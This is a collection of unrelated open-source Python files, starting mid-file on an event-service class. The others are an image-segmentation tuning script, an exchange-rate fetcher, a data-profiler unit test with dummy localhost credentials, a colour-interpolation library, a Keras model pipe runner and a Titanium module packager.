update_log_service_result = self.get_service_result(update_log_service)
if not self.is_success(update_log_service_result):
self.log(self.get_msg(update_log_service_result), level="error")
def after_event(self):
event_template = self.get_event_template()
params_result = self.get_params_result()
req = get_safe_data(self.get_finish_service_name(), event_template)
if req:
# 构造结束服务
node = {
self.get_service_name(): req
}
finish = self.get_node_service(node, params_result, append_param=False)
finish = self.get_data(finish)
if self.can_log():
self.log(json.dumps(finish))
# 执行结束服务
finish_result = self.get_service_result(finish)
if self.can_log():
self.log(json.dumps(finish_result))
if not self.is_success(finish_result):
return finish_result
return self.success([])
def execute_event(self):
event_template = self.get_event_template()
params_result = self.get_params_result()
to_services = self.get_to_services()
params_result[self.get_to_name()] = to_services
req = get_safe_data(self.get_bulk_service_name(), event_template)
if not req:
return self.fail("没有配置批量执行的服务")
# 构造批量服务
node = {
self.get_service_name(): req
}
bulk = self.get_node_service(node, params_result, append_param=False)
bulk = self.get_data(bulk)
if self.can_log():
self.log(json.dumps(bulk))
# 批量执行服务
bulk_result = self.get_service_result(bulk)
if self.can_log():
self.log(json.dumps(bulk_result))
bulk_result_field = get_safe_data(self.get_bulk_result_field_name(), event_template)
# 设置批量结果
if not self.is_success(bulk_result):
return bulk_result
res = self.get_data(bulk_result)
if bulk_result_field:
params_result[bulk_result_field] = res
del params_result[self.get_to_name()]
# 设置单个结果
for request, result in zip(get_safe_data(self.get_to_name(), event_template), res):
save_field = get_safe_data(self.get_save_field_name(), request)
params_result[save_field] = result
self.add_update_log_data(get_safe_data(self.get_service_name(), request), result)
# 构造结束服务
self.update_log_data()
return self.success([])
def result(self, params=None):
params_result = self.get_params_result()
data_json_result = self.get_data_json(params_result)
if not self.is_success(data_json_result):
return data_json_result
data_json_templ = self.get_data(data_json_result)
data_json_result = self.get_event_param(data_json_templ)
if not self.is_success(data_json_result):
return data_json_result
event_template = self.get_data(data_json_result)
self.set_event_template(event_template)
# 检查
check_result = self.event_check()
if not self.is_success(check_result):
return check_result
# 执行前
before_result = self.before_event()
if not self.is_success(before_result):
return before_result
# 执行中
execute_result = self.execute_event()
if not self.is_success(execute_result):
return execute_result
# 执行后
after_result = self.after_event()
if not self.is_success(after_result):
return after_result
return self.success(data={}, msg="发送成功")
|
import os
import json
image_dir = 'data/validation_set'
truth = 'data/validation_cardinfo'
out_base = 'data/tune_only_mip_det'
mip_splits = ['cb', 'cr', 'cbcr', 'sat', 'val']
mip_features = ['fft', 'hog', 'sobel', 'none']
# i = 0
# trials = []
# for mip_split in mip_splits:
# for mip_feature in mip_features:
# out_dir = os.path.join(out_base, str(i).zfill(4))
# trial = {'out_dir': out_dir,
# 'split': 'none',
# 'binary': 'none',
# 'f_size': 1,
# 'input_imgs': image_dir,
# 'truth_data': truth,
# 'mip_method': 'classical',
# 'method_details':
# {'mip_channel_split': mip_split,
# 'mip_image_features': mip_feature}
# }
# trials.append(trial)
# i += 1
#
# with open('data/tune_only_mip_det.json', 'w') as f:
# json.dump(trials, f, indent=2)
# iter_counts = [3, 5]
# scales = [0.1, 0.5]
# k_scales = [0.01, 0.05, 0.10]
# rect_scales = [[0.01, 0.01, 0.01, 0.01],
# [0.02, 0.01, 0.02, 0.01],
# [0.02, 0.02, 0.02, 0.02],
# [0.01, 0.02, 0.01, 0.02],
# [0.05, 0.02, 0.05, 0.02],
# [0.05, 0.05, 0.05, 0.05],
# [0.02, 0.05, 0.02, 0.05],
# [0.05, 0.05, 0.05, 0.05],
# [0.01, 0.05, 0.01, 0.05],
# [0.05, 0.01, 0.05, 0.01]]
#
#
# i = 20
# iter_counts = [5]
# scales = [0.1, 0.25, 0.5]
# k_scales = [0.01, 0.05, 0.10]
# rect_scales = [[0.05, 0.05, 0.01, 0.01],
# [0.05, 0.01, 0.01, 0.05],
# [0.05, 0.03, 0.05, 0.03],
# [0.01, 0.05, 0.05, 0.01]]
#
#
# i = 140
#
# trials = []
# for iter_count in iter_counts:
# for scale in scales:
# for k_scale in k_scales:
# for rect_scale in rect_scales:
# out_dir = os.path.join(out_base, str(i).zfill(4))
# trial = {'out_dir': out_dir,
# 'split': 'none',
# 'binary': 'none',
# 'f_size': 1,
# 'input_imgs': image_dir,
# 'truth_data': truth,
# 'mip_method': 'grabcut',
# 'method_details':
# {'gc_type': 'rect',
# 'probable_background': [0.0, 0.0, 0.0, 0.0],
# 'probable_foreground': [0.0, 0.0, 0.0, 0.0],
# 'sure_foreground': [0.0, 0.0, 0.0, 0.0],
# 'iter_count': iter_count,
# 'scale': scale,
# 'k_scale': k_scale,
# 'rect_scale': rect_scale}
# }
# trials.append(trial)
# i += 1
#
# with open('data/tune_only_mip_det_pt3.json', 'w') as f:
# json.dump(trials, f, indent=2)
# probable_backgrounds = [[0.01, 0.001, 0.01, 0.001],
# [0.001, 0.001, 0.001, 0.001]]
# probable_foregrounds = [[0.05, 0.01, 0.05, 0.01],
# [0.05, 0.03, 0.05, 0.03]]
# sure_foregrounds = [[0.1, 0.05, 0.1, 0.05],
# [0.2, 0.1, 0.2, 0.1]]
#
#
# i = 176
#
# trials = []
# for prob_back in probable_backgrounds:
# for prob_fore in probable_foregrounds:
# for sure_fore in sure_foregrounds:
# out_dir = os.path.join(out_base, str(i).zfill(4))
# trial = {'out_dir': out_dir,
# 'split': 'none',
# 'binary': 'none',
# 'f_size': 1,
# 'input_imgs': image_dir,
# 'truth_data': truth,
# 'mip_method': 'grabcut',
# 'method_details':
# {'gc_type': 'rect',
# 'probable_background': prob_back,
# 'probable_foreground': prob_fore,
# 'sure_foreground': sure_fore,
# 'iter_count': 5,
# 'scale': 0.5,
# 'k_scale': 0.05,
# 'rect_scale': [0.0, 0.0, 0.0, 0.0]}
# }
# trials.append(trial)
# i += 1
#
# with open('data/tune_only_mip_det_pt4.json', 'w') as f:
# json.dump(trials, f, indent=2)
probable_backgrounds = [[0.0505, 0.0440, 1 - 0.9264, 1- 0.9702],
[0.05, 0.05, 0.05, 0.05]]
probable_foregrounds = [[0.1247, 0.1735, 1 - 0.8624, 1 - 0.8530],
[0.2, 0.2, 0.2, 0.2]]
sure_foregrounds = [[0.1781, 0.3087, 1 - 0.7926, 1 - 0.6522],
[0.4, 0.4, 0.4, 0.4]]
i = 184
trials = []
for prob_back in probable_backgrounds:
for prob_fore in probable_foregrounds:
for sure_fore in sure_foregrounds:
out_dir = os.path.join(out_base, str(i).zfill(4))
trial = {'out_dir': out_dir,
'split': 'none',
'binary': 'none',
'f_size': 1,
'input_imgs': image_dir,
'truth_data': truth,
'mip_method': 'grabcut',
'method_details':
{'gc_type': 'mask',
'probable_background': prob_back,
'probable_foreground': prob_fore,
'sure_foreground': sure_fore,
'iter_count': 5,
'scale': 0.25,
'k_scale': 0.05,
'rect_scale': [0.0, 0.0, 0.0, 0.0]}
}
trials.append(trial)
i += 1
with open('data/tune_only_mip_det_pt5.json', 'w') as f:
json.dump(trials, f, indent=2) |
import UserDict
import calendar
import requests
class UsdRates(UserDict.UserDict):
def __init__(self, currencies, backup_rates={}, translations={}):
UserDict.UserDict.__init__(self)
translations_r = {v: k for k, v in translations.iteritems()}
BATCH_SIZE = 4
todo = currencies[:]
while todo:
batch = todo[:BATCH_SIZE]
todo = todo[BATCH_SIZE:]
rates = self._get_exchanges_now(translations.get(coin, coin)
for coin in batch)
self.update({translations_r.get(coin, coin): v
for coin, v in rates.iteritems()})
for coin in set(backup_rates) - set(self.keys()):
self[coin] = backup_rates[coin]
@staticmethod
def _get_exchanges_now(currencies):
url_current = ("https://min-api.cryptocompare.com/data/price"
"?fsym=USD&tsyms=%s" % (",".join(currencies)))
return requests.get(url_current).json()
@staticmethod
def _get_exchanges_at(at, currencies):
'''
Usage: self._get_exchanges_at(datetime.datetime.utcnow(), batch)
'''
ts = calendar.timegm(at.utctimetuple())
url_historical = ("https://min-api.cryptocompare.com/data/pricehisto"
"rical?fsym=USD&tsyms=%s&ts=%d" %
(",".join(currencies), ts))
return requests.get(url_historical).json()['USD']
|
"""
Copyright 2021 Merck & Co., Inc. Kenilworth, NJ, USA.
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from dataprofiler.job_api import Job, JobType, JobStatus, TableLoadDetail, SqlSyncDetail, BulkIngestAndCommitDetail
from dataprofiler.table_mapper_api import Table
from dataprofiler.tools.auto_sql_syncker import run_sql_sync_for_commit
def test_run_sql_sync_for_commit(mocker):
mocked_config = mocker.patch('dataprofiler.tools.auto_sql_syncker.Config')
mocked_japi = mocker.patch('dataprofiler.tools.auto_sql_syncker.JobApi.jobs')
mocked_tapi = mocker.patch('dataprofiler.tools.auto_sql_syncker.TableMapperApi.tables_like')
mocked_reruner = mocker.patch('dataprofiler.tools.auto_sql_syncker.run_list_sql_sync_from_details')
faked_api = 'http://localhost/testtest'
faked_env = 'testtesttest'
faked_user = 'test123'
target_md_version = 'testtesttesttesttest'
target_datsetname = 'camtest'
target_tablename = 'testcam'
mocked_config.environment = faked_api
# Job Api
# 1) Call to table loads
# 2) Call to sql syncs
table_load1 = Job(faked_api) # matches all criteria for a run
table_load1.id = 1
table_load1.type = JobType.TABLE_LOAD
table_load1.status = JobStatus.COMPLETE
table_load1.environment = faked_env
table_load1.creating_user = faked_user
table_load1.details = TableLoadDetail.from_json(1, {
'datasetName': target_datsetname,
'tableName': target_tablename,
'metadataVersion': target_md_version,
})
table_load2 = Job(faked_api)
table_load2.id = 2
table_load2.type = JobType.TABLE_LOAD
table_load2.status = JobStatus.COMPLETE
table_load2.environment = faked_env
table_load2.creating_user = faked_user
table_load2.details = TableLoadDetail.from_json(2, {
'datasetName': 'notcamtest',
'tableName': 'nottestcam',
'metadataVersion': 'nottest',
})
table_load3 = Job(faked_api) # Matches metadata version and dataset name
table_load3.id = 3
table_load3.type = JobType.TABLE_LOAD
table_load3.status = JobStatus.COMPLETE
table_load3.environment = faked_env
table_load3.creating_user = faked_user
table_load3.details = TableLoadDetail.from_json(3, {
'datasetName': target_datsetname,
'tableName': 'some_table',
'metadataVersion': target_md_version,
})
sql_sync1 = Job(faked_api) # Matches sql sync completely
sql_sync1.id = 4
sql_sync1.type = JobType.SQLSYNC
sql_sync1.status = JobStatus.COMPLETE
sql_sync1.environment = faked_env
sql_sync1.creating_user = faked_user
sql_sync1.details = SqlSyncDetail.from_json(4, {
'downloads': [{
'dataset': target_datsetname,
'table': target_tablename,
'timestamp_format': 'dd MMM yyy hh:mm:ssa',
'date_format': 'dd MMMyyy'
}],
'jdbcConnection': {
'url': 'jdbc:redshift://localhost',
'user': 'test',
'passwd': 'a'
},
'visibilities': ['LIST.PUBLIC_DATA'],
'externalUsers': ['testman']
})
sql_sync2 = Job(faked_api)
sql_sync2.id = 5
sql_sync2.type = JobType.SQLSYNC
sql_sync2.status = JobStatus.COMPLETE
sql_sync2.environment = faked_env
sql_sync2.creating_user = faked_user
sql_sync2.details = SqlSyncDetail.from_json(5, {
'downloads': [{
'dataset': 'notcamtest',
'table': 'nottestcam',
'timestamp_format': 'dd MMM yyy hh:mm:ssa',
'date_format': 'dd MMMyyy'
}],
'jdbcConnection': {
'url': 'jdbc:redshift://localhost',
'user': 'test',
'passwd': 'a'
},
'visibilities': ['LIST.PUBLIC_DATA'],
'externalUsers': ['testman']
})
sql_sync3 = Job(faked_api) # Matches sql sync completely, later timestamp!
sql_sync3.id = 5
sql_sync3.type = JobType.SQLSYNC
sql_sync3.status = JobStatus.COMPLETE
sql_sync3.environment = faked_env
sql_sync3.creating_user = faked_user
sql_sync3.details = SqlSyncDetail.from_json(5, {
'downloads': [{
'dataset': target_datsetname,
'table': target_tablename,
'timestamp_format': 'dd MMM yyy hh:mm:ssa',
'date_format': 'dd MMMyyy'
}],
'jdbcConnection': {
'url': 'jdbc:redshift://localhost',
'user': 'test',
'passwd': 'a'
},
'visibilities': ['LIST.PUBLIC_DATA'],
'externalUsers': ['testman']
})
sql_sync4 = Job(faked_api) # Matches but with different table name
sql_sync4.id = 6
sql_sync4.type = JobType.SQLSYNC
sql_sync4.status = JobStatus.COMPLETE
sql_sync4.environment = faked_env
sql_sync4.creating_user = faked_user
sql_sync4.details = SqlSyncDetail.from_json(6, {
'downloads': [{
'dataset': target_datsetname,
'table': 'some_table',
'timestamp_format': 'dd MMM yyy hh:mm:ssa',
'date_format': 'dd MMMyyy'
}],
'jdbcConnection': {
'url': 'jdbc:redshift://localhost/a',
'user': 'test',
'passwd': 'a'
},
'visibilities': ['LIST.PUBLIC_DATA'],
'externalUsers': ['testman']
})
mocked_japi.side_effect = iter([(table_load2,table_load1, table_load3), (sql_sync1, sql_sync2, sql_sync3, sql_sync4)])
# Table Api: Called per value in download of sql sync detail
table1 = Table(faked_api)
table1.id = 1
table1.environment = faked_env
table1.dataset_name = target_datsetname
table1.table_name = target_tablename
table1.enabled = True
table2 = Table(faked_api)
table2.id = 2
table2.environment = faked_env
table2.dataset_name = target_datsetname
table2.table_name = 'some_table'
table2.enabled = True
mocked_tapi.return_value = [table1, table2]
#mocked_tapi.side_effect = iter([(table1, table2)])
mocked_reruner.return_value = 2 # Used with the debug output, may not be representative of it actually working
test_commit = Job(faked_api)
test_commit.details = BulkIngestAndCommitDetail.from_json(0, {
'metadataVersion': target_md_version
})
run_sql_sync_for_commit(test_commit)
#assert False uncomment for debug output
|
#!/usr/bin/env python
from __future__ import division, absolute_import, print_function
"""
Interpolate between colours in RGB space; make continuous colour maps.
Definition
----------
Calculates colour between two given colors in RGB space
def rgb_blend(col1, col2, fraction=0.5):
n interpolated colours between two colours in RGB space
def rgb_range(col1, col2, n=255, cmap=None, pow=1):
n interpolated colours in RGB space between several colours changing
at certain fractions
def rgb_gradient(colours, fractions, n=255, cmap=None):
Input
-----
rgb_blend
col1 1st rgb colour tuple
col2 2nd rgb colour tuple
rgb_range
col1 1st rgb colour tuple
col2 2nd rgb colour tuple
rgb_gradient
colours Nx3 array like of colour tuples
fractions N array like of fractions for blending between colours
Optional Input
--------------
rgb_blend
fraction fraction between 0=col1 and 1=col2; default: 0.5
rgb_range
n number of interpolated colours with first colour=col1 and
last colour=col2; default: 255
cmap if given, register colour map under that name
pow 1 (default) is linear interpolation
>1 remains longer near col1, i.e. higher values are detailed
<1 remains longer near col2, i.e. lower values are detailed
rgb_gradient
n number of interpolated colours with first colour=first colour
in colours and last colour=last colour in colours; default: 255
cmap if given, register colour map under that name
Output
------
rgb_blend rgb tuple
rgb_range list of rgb tuples
rgb_gradient list of rgb tuples
Examples
--------
>>> r = (1.0,0.0,0.0)
>>> b = (0.0,0.0,1.0)
>>> print(rgb_blend(r,b,0.0), rgb_blend(r,b,0.5), rgb_blend(r,b,1.0))
(1.0, 0.0, 0.0) (0.5, 0.0, 0.5) (0.0, 0.0, 1.0)
>>> print(rgb_range(r,b,3))
[(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
>>> print(rgb_range(r,b,3,pow=2))
[(1.0, 0.0, 0.0), (0.75, 0.0, 0.25), (0.0, 0.0, 1.0)]
>>> print(rgb_gradient([r,b],[0.0,1.0],3))
[(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
>>> print(rgb_gradient([r,r,b,b],[0.0,0.25,0.75,1.0],5, cmap='MyGradient'))
[(1.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0), (0.0, 0.0, 1.0)]
License
-------
This file is part of the JAMS Python package, distributed under the MIT
License. The JAMS Python package originates from the former UFZ Python library,
Department of Computational Hydrosystems, Helmholtz Centre for Environmental
Research - UFZ, Leipzig, Germany.
Copyright (c) 2013-2021 Matthias Cuntz - mc (at) macu (dot) de
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
History
-------
Written, Matthias Cuntz, Apr 2013
Modified, Matthias Cuntz, Sep 2021 - code refactoring
"""
import numpy as np
import jams.const as const
__all__ = ['rgb_blend', 'rgb_gradient', 'rgb_range']
# ---------------------------------------------------------------------
# http://stackoverflow.com/questions/25007/conditional-formatting-percentage-to-color-conversion
def rgb_blend(col1, col2, fraction=0.5):
"""
Calculates colour between two colors.
Definition
----------
def rgb_blend(col1, col2, fraction=0.5):
Input
-----
col1 1st rgb colour tuple
col2 2nd rgb colour tuple
Optional Input
--------------
fraction fraction between 0=col1 and 1=col2; default: 0.5
Output
------
rgb_blend rgb tuple
Examples
--------
>>> r = (1.0,0.0,0.0)
>>> b = (0.0,0.0,1.0)
>>> print(rgb_blend(r,b,0.0), rgb_blend(r,b,0.5), rgb_blend(r,b,1.0))
(1.0, 0.0, 0.0) (0.5, 0.0, 0.5) (0.0, 0.0, 1.0)
History
-------
Written, Matthias Cuntz, Apr 2013
"""
return tuple([v1 + (v2-v1)*fraction for (v1, v2) in zip(col1, col2)])
# ---------------------------------------------------------------------
def rgb_range(col1, col2, n=255, cmap=None, pow=1):
"""
n interpolated colours between two colours.
Definition
----------
def rgb_range(col1, col2, n=255, cmap=None, pow=1):
Input
-----
col1 1st rgb colour tuple
col2 2nd rgb colour tuple
Optional Input
--------------
n number of interpolated colours with first colour=col1
and last colour=col2; default: 255
cmap if given, register colour map under that name
pow 1 (default) is linear interpolation
>1 remains longer near col1, i.e. higher values are detailed
<1 remains longer near col2, i.e. lower values are detailed
Output
------
rgb_range list of rgb tuples
Examples
--------
>>> r = (1.0,0.0,0.0)
>>> b = (0.0,0.0,1.0)
>>> print(rgb_range(r,b,3))
[(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
>>> print(rgb_range(r,b,3,pow=2))
[(1.0, 0.0, 0.0), (0.75, 0.0, 0.25), (0.0, 0.0, 1.0)]
History
-------
Written, Matthias Cuntz, Apr 2013
"""
colr = [rgb_blend(col1, col2, (float(i)/float(n-1))**pow)
for i in range(n)]
if cmap is not None:
import matplotlib.colors as col
import matplotlib.cm as cm
iscmap = col.ListedColormap(colr, name=cmap, N=n)
cm.register_cmap(name=cmap, cmap=iscmap)
return colr
# ---------------------------------------------------------------------
def rgb_gradient(colours, fractions, n=255, cmap=None):
"""
n interpolated colours between several colours changing at certain
fractions.
Definition
----------
def rgb_gradient(colours, fractions, n=255, cmap=None):
Input
-----
colours Nx3 array like of colour tuples
fractions N array like of fractions for blending between colours
Optional Input
--------------
n number of interpolated colours with first colour=first colour
in colours and last colour=last colour in colours;
default: 255
cmap if given, register colour map under that name
Output
------
rgb_gradient list of rgb tuples
Examples
--------
>>> r = (1.0,0.0,0.0)
>>> b = (0.0,0.0,1.0)
>>> print(rgb_gradient([r,b],[0.0,1.0],3))
[(1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0)]
>>> print(rgb_gradient([r,r,b,b],[0.0,0.25,0.75,1.0],5))
[(1.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0), (0.0, 0.0, 1.0)]
>>> print(rgb_gradient([r,r,b,b],[0.0,0.25,0.75,1.0],5, cmap='MyGradient'))
[(1.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.5, 0.0, 0.5), (0.0, 0.0, 1.0), (0.0, 0.0, 1.0)]
History
-------
Written, Matthias Cuntz, Apr 2013
"""
cols = np.array(colours)
fracs = np.array(fractions)
if cols.shape[0] != fracs.size:
raise ValueError('colours.shape[0] != fractions.size')
colors = []
for i in range(n):
frac = float(i)/float(n-1)
if frac <= fracs[0]: # before first fraction
colors += [tuple(cols[0, :])]
elif frac >= fracs[-1]: # after last fraction
colors += [tuple(cols[-1, :])]
else:
ii = np.where(fracs >= frac)[0][0]
if np.abs(fracs[ii]-frac) > const.eps: # exactly a fraction
colors += [rgb_blend(cols[ii-1, :], cols[ii, :], frac)]
else:
colors += [tuple(cols[ii, :])]
if cmap is not None:
import matplotlib.colors as col
import matplotlib.cm as cm
iscmap = col.ListedColormap(colors, name=cmap, N=n)
cm.register_cmap(name=cmap, cmap=iscmap)
return colors
# ---------------------------------------------------------------------
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
# r = (1.0,0.0,0.0)
# b = (0.0,0.0,1.0)
# print(rgb_blend(r,b,0), rgb_blend(r,b,0.1), rgb_blend(r,b,0.2), rgb_blend(r,b,0.3),
# rgb_blend(r,b,0.4), rgb_blend(r,b,0.5), rgb_blend(r,b,0.6), rgb_blend(r,b,0.7),
# rgb_blend(r,b,0.8), rgb_blend(r,b,0.9), rgb_blend(r,b,1))
# print(rgb_range(r,b,11))
# print(rgb_gradient([r,b],[0,1],11))
# print(rgb_gradient([r,r,b,b],[0,0.4,0.6,1],11))
# print(rgb_gradient([r,r,b,b],[0,0.3,0.7,1],11))
# print(rgb_range(r,b,11))
# print(rgb_range(r,b,11, pow=3))
# print(rgb_range(r,b,11, pow=0.3))
|
#!/usr/bin/env python3
# TODO: why are the keras models saved with python 2?
from __future__ import print_function
import tensorflow as tf
import os
import sys
import tensorflow.keras as keras
import numpy as np
from tensorflow.keras.models import Model
from tensorflow.keras.models import load_model
def read(sz):
dd = []
gt = 0
while gt < sz*4:
st = os.read(0, sz*4 - gt)
assert(len(st) > 0)
dd.append(st)
gt += len(st)
return np.fromstring(b''.join(dd), dtype=np.float32)
def write(d):
os.write(1, d.tobytes())
def run_loop(m):
isize = m.inputs[0].shape[1]
osize = m.outputs[0].shape[1]
print("ready to run keras model %d -> %d" % (isize, osize), file=sys.stderr)
while 1:
idata = read(isize).reshape((1, isize))
ret = m.predict_on_batch(idata)
write(ret)
if __name__ == "__main__":
print(tf.__version__, file=sys.stderr)
# limit gram alloc
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
tf.config.experimental.set_virtual_device_configuration(gpus[0], [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=2048)])
m = load_model(sys.argv[1])
print(m, file=sys.stderr)
bs = [int(np.product(ii.shape[1:])) for ii in m.inputs]
ri = keras.layers.Input((sum(bs),))
tii = []
acc = 0
for i, ii in enumerate(m.inputs):
print(ii, file=sys.stderr)
ti = keras.layers.Lambda(lambda x: x[:,acc:acc+bs[i]], output_shape=(1, bs[i]))(ri)
acc += bs[i]
tr = keras.layers.Reshape(ii.shape[1:])(ti)
tii.append(tr)
no = keras.layers.Concatenate()(m(tii))
m = Model(inputs=ri, outputs=[no])
run_loop(m)
|
#!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk']
module_defaults = {
'description':'Couchbase Lite',
'author': 'Couchbase, Inc.',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Couchbase, Inc.' % str(date.today().year),
}
module_license_default = """COUCHBASE INC. COMMUNITY EDITION LICENSE AGREEMENT
IMPORTANT-READ CAREFULLY: BY CLICKING THE "I ACCEPT" BOX OR INSTALLING,
DOWNLOADING OR OTHERWISE USING THIS SOFTWARE AND ANY ASSOCIATED
DOCUMENTATION, YOU, ON BEHALF OF YOURSELF OR AS AN AUTHORIZED
REPRESENTATIVE ON BEHALF OF AN ENTITY ("LICENSEE") AGREE TO ALL THE
TERMS OF THIS COMMUNITY EDITION LICENSE AGREEMENT (THE "AGREEMENT")
REGARDING YOUR USE OF THE SOFTWARE. YOU REPRESENT AND WARRANT THAT YOU
HAVE FULL LEGAL AUTHORITY TO BIND THE LICENSEE TO THIS AGREEMENT. IF YOU
DO NOT AGREE WITH ALL OF THESE TERMS, DO NOT SELECT THE "I ACCEPT" BOX
AND DO NOT INSTALL, DOWNLOAD OR OTHERWISE USE THE SOFTWARE. THE
EFFECTIVE DATE OF THIS AGREEMENT IS THE DATE ON WHICH YOU CLICK "I
ACCEPT" OR OTHERWISE INSTALL, DOWNLOAD OR USE THE SOFTWARE.
1. License Grant. Couchbase Inc. hereby grants Licensee, free of charge,
the non-exclusive right to use, copy, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to
whom the Software is furnished to do so, subject to Licensee including
the following copyright notice in all copies or substantial portions of
the Software:
Couchbase (r) http://www.Couchbase.com Copyright 2013 Couchbase, Inc.
As used in this Agreement, "Software" means the object code version of
the applicable elastic data management server software provided by
Couchbase Inc.
2. Restrictions. Licensee will not reverse engineer, disassemble, or
decompile the Software (except to the extent such restrictions are
prohibited by law).
3. Support. Couchbase, Inc. will provide Licensee with access to, and
use of, the Couchbase, Inc. support forum available at the following
URL: http://www.couchbase.org/forums/. Couchbase, Inc. may, at its
discretion, modify, suspend or terminate support at any time upon notice
to Licensee.
4. Warranty Disclaimer and Limitation of Liability. THE SOFTWARE IS
PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
COUCHBASE INC. OR THE AUTHORS OR COPYRIGHT HOLDERS IN THE SOFTWARE BE
LIABLE FOR ANY CLAIM, DAMAGES (IINCLUDING, WITHOUT LIMITATION, DIRECT,
INDIRECT OR CONSEQUENTIAL DAMAGES) OR OTHER LIABILITY, WHETHER IN AN
ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
def find_sdk(config):
sdk = config['TITANIUM_SDK']
return os.path.expandvars(os.path.expanduser(sdk))
def replace_vars(config,token):
idx = token.find('$(')
while idx != -1:
idx2 = token.find(')',idx+2)
if idx2 == -1: break
key = token[idx+2:idx2]
if not config.has_key(key): break
token = token.replace('$(%s)' % key, config[key])
idx = token.find('$(')
return token
def read_ti_xcconfig():
contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
config = {}
for line in contents.splitlines(False):
line = line.strip()
if line[0:2]=='//': continue
idx = line.find('=')
if idx > 0:
key = line[0:idx].strip()
value = line[idx+1:].strip()
config[key] = replace_vars(config,value)
return config
def generate_doc(config):
docdir = os.path.join(cwd,'documentation')
if not os.path.exists(docdir):
print "Couldn't find documentation file at: %s" % docdir
return None
try:
import markdown2 as markdown
except ImportError:
import markdown
documentation = []
for file in os.listdir(docdir):
if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
continue
md = open(os.path.join(docdir,file)).read()
html = markdown.markdown(md)
documentation.append({file:html});
return documentation
def compile_js(manifest,config):
js_file = os.path.join(cwd,'assets','com.couchbase.cbl.js')
if not os.path.exists(js_file): return
from compiler import Compiler
try:
import json
except:
import simplejson as json
compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
root_asset, module_assets = compiler.compile_module()
root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
from tools import splice_code
assets_router = os.path.join(cwd,'Classes','ComCouchbaseCblModuleAssets.m')
splice_code(assets_router, 'asset', root_asset_content)
splice_code(assets_router, 'resolve_asset', module_asset_content)
# Generate the exports after crawling all of the available JS source
exports = open('metadata.json','w')
json.dump({'exports':compiler.exports }, exports)
exports.close()
def die(msg):
print msg
sys.exit(1)
def warn(msg):
print "[WARN] %s" % msg
def validate_license():
c = open(os.path.join(cwd,'../LICENSE')).read()
if c.find(module_license_default)!=-1:
warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
path = os.path.join(cwd,'manifest')
f = open(path)
if not os.path.exists(path): die("missing %s" % path)
manifest = {}
for line in f.readlines():
line = line.strip()
if line[0:1]=='#': continue
if line.find(':') < 0: continue
key,value = line.split(':')
manifest[key.strip()]=value.strip()
for key in required_module_keys:
if not manifest.has_key(key): die("missing required manifest key '%s'" % key)
if module_defaults.has_key(key):
defvalue = module_defaults[key]
curvalue = manifest[key]
if curvalue==defvalue: warn("please update the manifest key: '%s' to a non-default value" % key)
return manifest,path
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
